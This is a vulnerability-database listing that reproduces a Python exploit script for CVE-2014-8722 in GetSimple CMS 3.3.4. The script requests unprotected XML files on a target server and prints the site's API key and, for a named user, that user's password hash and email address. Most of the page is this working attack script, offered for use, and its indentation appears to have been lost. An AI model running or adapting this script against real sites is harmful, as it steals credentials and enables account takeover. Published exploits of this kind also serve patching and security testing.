Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormRon JostPACKETSTORM:162906
HistoryJun 02, 2021 - 12:00 a.m.

GetSimple CMS 3.3.4 Information Disclosure

2021-06-0200:00:00
Ron Jost
packetstormsecurity.com
104
JSON
`# Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure  
# Date 01.06.2021  
# Exploit Author: Ron Jost (Hacker5preme)  
# Vendor Homepage: http://get-simple.info/  
# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip  
# Version: 3.3.4  
# CVE: CVE-2014-8722  
# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2014-8722-Exploit  
  
  
'''  
Description:  
GetSimple CMS 3.3.4 allows remote attackers to obtain sensitive information via a direct request to  
(1) data/users/<username>.xml,  
(2) backups/users/<username>.xml.bak,  
(3) data/other/authorization.xml, or  
(4) data/other/appid.xml.  
'''  
  
  
'''  
Import required modules:  
'''  
import sys  
import requests  
  
'''  
User-Input:  
'''  
target_ip = sys.argv[1]  
target_port = sys.argv[2]  
cmspath = sys.argv[3]  
print('')  
username = input("Do you know the username? Y/N: ")  
if username == 'Y':  
print('')  
username = True  
username_string = input('Please enter the username: ')  
else:  
print('')  
username = False  
print('No problem, you will still get the API key')  
  
  
'''  
Get Api-Key:  
'''  
url = 'http://' + target_ip + ':' + target_port + cmspath + '/data/other/authorization.xml'  
header = {  
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",  
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",  
"Accept-Language": "de,en-US;q=0.7,en;q=0.3",  
"Accept-Encoding": "gzip, deflate",  
"Connection": "close",  
"Upgrade-Insecure-Requests": "1",  
"Cache-Control": "max-age=0"  
}  
x = requests.get(url, headers=header).text  
start = x.find('[') + 7  
end = x.find(']')  
api_key = x[start:end]  
print('')  
print('Informations:')  
print('')  
print('[*] API Key: ' + api_key)  
  
  
if username:  
'''  
Get Email and Passwordhash:  
'''  
url = "http://" + target_ip + ':' + target_port + cmspath + '/data/users/' + username_string + '.xml'  
header = {  
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",  
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",  
"Accept-Language": "de,en-US;q=0.7,en;q=0.3",  
"Accept-Encoding": "gzip, deflate",  
"Connection": "close",  
"Upgrade-Insecure-Requests": "1",  
"Cache-Control": "max-age=0"  
}  
x = requests.get(url, headers=header).text  
start = x[x.find('PWD>'):]  
passwordhash = start[start.find('>') +1 :start.find('<')]  
print('[*] Hashed Password: ' + passwordhash)  
  
start = x[x.find('EMAIL>'):]  
email = start[start.find('>') + 1 : start.find('<')]  
print('[*] Email: ' + email)  
print('')  
  
`

Related

zdt 1
prion 1
cve 1
exploitdb 1
zdt
zdt
GetSimple CMS 3.3.4 - Information Disclosure Exploit
2021-06-02 00:00:00
prion
prion
Information disclosure
2017-03-17 14:59:00
cve
cve
CVE-2014-8722
2017-03-17 14:59:00
exploitdb
exploitdb
GetSimple CMS 3.3.4 - Information Disclosure
2021-06-02 00:00:00
JSON
Related for PACKETSTORM:162906
zdt1prion1cve1exploitdb1